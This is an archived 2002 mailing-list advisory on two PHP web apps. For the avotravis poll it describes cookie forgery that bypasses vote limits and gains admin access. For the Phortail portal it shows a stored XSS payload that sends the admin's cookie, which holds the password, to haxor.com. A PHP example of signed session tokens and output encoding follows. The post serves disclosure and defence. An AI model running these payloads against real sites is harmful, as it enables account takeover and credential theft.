The first one is the poll "avotravis", versions 2.1 and less.

1) Distortion of the limitation on multiple votes:
Set the cookie with the name "already_voted" and value "1" to the URL /avotravis.php3?vote=1 for "yes" and /avotravis.php3?vote=1 for "no".

2) Access to the administration part:
Set the cookie "adminsondage", "true" to the webpage http://www.host.com/admin.php3

More details in French: http://www.ifrance.com/kitetoua/tuto/avotravis.txt

The second is the portal "Phortail", versions 1.2.1 and less.

The admin password is sent unencrypted by cookie and there isn't any limitation on the posting of news for scripts. It is enough to send this kind of script:

<im*g src="javascri*pt:phortail()">
<s*cript>function phortail() { a="http://haxor.com/file?"+document.cookie; window.open(a); } </s*cript>

(without '*') as a news item and wait for the admin...

More details in French: http://www.ifrance.com/kitetoua/tuto/phortail.txt

The creators have been alerted.

Sorry for my bad English.

frog-m@n
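An added example, not part of the original post and not code from avotravis or Phortail: it contrasts a client-set flag cookie like the "adminsondage" check described above with a server-signed session token that carries no password, and shows submitted news being encoded on output. The SECRET value, the "admin_session" cookie name, the token layout and all function names are assumptions made for this illustration.

```php
<?php
// Added illustration. SECRET, 'admin_session' and the token layout are assumed.
const SECRET = 'replace-with-random-server-side-key'; // constructed placeholder

// Weak pattern from the post: the cookie value itself is the authorization.
function is_admin_weak(array $cookies): bool {
    return ($cookies['adminsondage'] ?? '') === 'true';
}

// Hardened: cookie is "user|expiry|mac". No password is stored in it, and
// only the server, which holds SECRET, can compute a valid mac.
// Assumes $user never contains the '|' separator.
function issue_admin_token(string $user, int $ttl, int $now): string {
    $payload = $user . '|' . ($now + $ttl);
    return $payload . '|' . hash_hmac('sha256', $payload, SECRET);
}

function is_admin_strong(array $cookies, int $now): bool {
    $parts = explode('|', $cookies['admin_session'] ?? '');
    if (count($parts) !== 3) {
        return false; // missing or malformed token
    }
    [$user, $expiry, $mac] = $parts;
    $expected = hash_hmac('sha256', $user . '|' . $expiry, SECRET);
    // Constant-time MAC comparison first, then the expiry check.
    return hash_equals($expected, $mac)
        && ctype_digit($expiry)
        && (int) $expiry > $now;
}

// Submitted news is encoded on output, so markup is displayed as text.
function render_news(string $body): string {
    return '<p>' . htmlspecialchars($body, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// Constructed sample input.
$now     = 1015300000;
$forged  = ['adminsondage' => 'true', 'admin_session' => 'admin|9999999999|deadbeef'];
$genuine = ['admin_session' => issue_admin_token('admin', 3600, $now)];

var_dump(is_admin_weak($forged));                  // flag set by the client
var_dump(is_admin_strong($forged, $now));          // forged MAC
var_dump(is_admin_strong($genuine, $now));         // server-issued token
var_dump(is_admin_strong($genuine, $now + 7200));  // same token after expiry
echo render_news('<b onmouseover="x()">news</b>'), "\n";
```

Marking the session cookie HttpOnly in addition keeps page scripts from reading it through document.cookie.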
This archive was generated by hypermail 2b30 : Mon Mar 04 2002 - 22:53:43 PST